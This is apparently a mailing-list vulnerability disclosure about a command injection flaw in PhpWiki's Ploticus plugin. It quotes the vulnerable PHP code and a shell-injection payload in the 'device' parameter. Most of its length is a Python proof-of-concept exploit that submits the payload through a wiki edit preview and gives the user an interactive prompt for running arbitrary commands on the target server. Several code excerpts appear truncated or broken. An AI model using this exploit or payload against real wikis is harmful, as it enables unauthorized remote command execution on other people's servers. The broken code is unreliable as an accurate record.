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PHP-Wiki Command Injection

Hi All

URL: https://sourceforge.net/projects/phpwiki/

I tried to report this a month ago, but got no response from the
developers. This is an old vulnerability I found while dusting off
some old hard drives.


PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site
where anyone can edit the pages through an HTML form. Multiple
storage backends, dynamic hyperlinking, themeable, scriptable by
plugins, full authentication, ACL's.


Straight command injection in the Ploticus module. Attached is a
working POC.

I found these notes I made:

<<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt=
help= >>
$ ls -la owned
-rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned

vuln code with system execute at the bottom
controllable param is $args
           $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
                $code = $this->execute(PLOTICUS_EXE . "
$tempfile.plo $args", $tempfile.".$gif");

['device'] is listed as an option by user when using the Politus

example usage;
 <?plugin Ploticus device||=png [ploticus options...]
     multiline ploticus script ...


   function getImage($dbi, $argarray, $request) {
        //extract($this->getArgs($argstr, $request));
        $source =& $this->source;
        if (!empty($source)) {
            if ($this->withShellCommand($source)) {
                $this->_errortext .= _("shell commands not allowed
in Ploticus");
                return false;
            if (is_array($argarray['data'])) { // support <!plugin-
list !> pagelists
                $src = "#proc getdata\ndata:";
                $i = 0;
                foreach ($argarray['data'] as $data) {
                    // hash or array?
                    if (is_array($data))
                        $src .= ("\t" . join(" ", $data) . "\n");
                        $src .= ("\t" . '"' . $data . '" ' . $i++ .
                $src .= $source;
                $source = $src;
            $tempfile = $this->tempnam('Ploticus','plo');
            $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
            if (!empty($argarray['-csmap'])) {
                    $args .= " -csmap -mapfile $tempfile.map";
                    $this->_mapfile = "$tempfile.map";
            if (!empty($argarray['-prefab'])) {
                    //check $_ENV['PLOTICUS_PREFABS'] and default
                global $HTTP_ENV_VARS;
                if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) {
                    if (file_exists("/usr/share/ploticus"))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] =
                    elseif (defined('PLOTICUS_PREFABS'))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] =
                    $args .= (" -prefab " . $argarray['-prefab']);
            if (isWindows()) {
                $fp = fopen("$tempfile.plo", "w");
                fwrite ($fp, $source);
                $code = $this->execute(PLOTICUS_EXE . "
$tempfile.plo $args", $tempfile.".$gif");

Many thanks,
Ben Harris

#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011

import urllib
import urllib2
import sys
def banner():
 print "     ____                    __                  _ __   _ "
 print "    / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
 print "   / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
 print "  / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
 print " /_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
 print "              /_/ /_/         /_/                     \n"

def usage():
 print " [+] Usage example"
 print " [-] python " + sys.argv[0] + " http://path.to/wiki"

if len(sys.argv)< 2:

domain = sys.argv[1]
def commandexec(cmd):
 data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
 cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
 cmd2 = urllib2.urlopen(cmd1)
 output = cmd2.read()
 firstloc = output.find("123:::\n") + len("123:::\n")
 secondloc = output.find("\n:::123")
 return output[firstloc:secondloc]

print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
 cmd = raw_input('Run a command: ')
 if cmd == 'quit':
  print "[-] Hope you had fun :)"
  quit = 1
 if cmd != 'quit':
  print commandexec(cmd)

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//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

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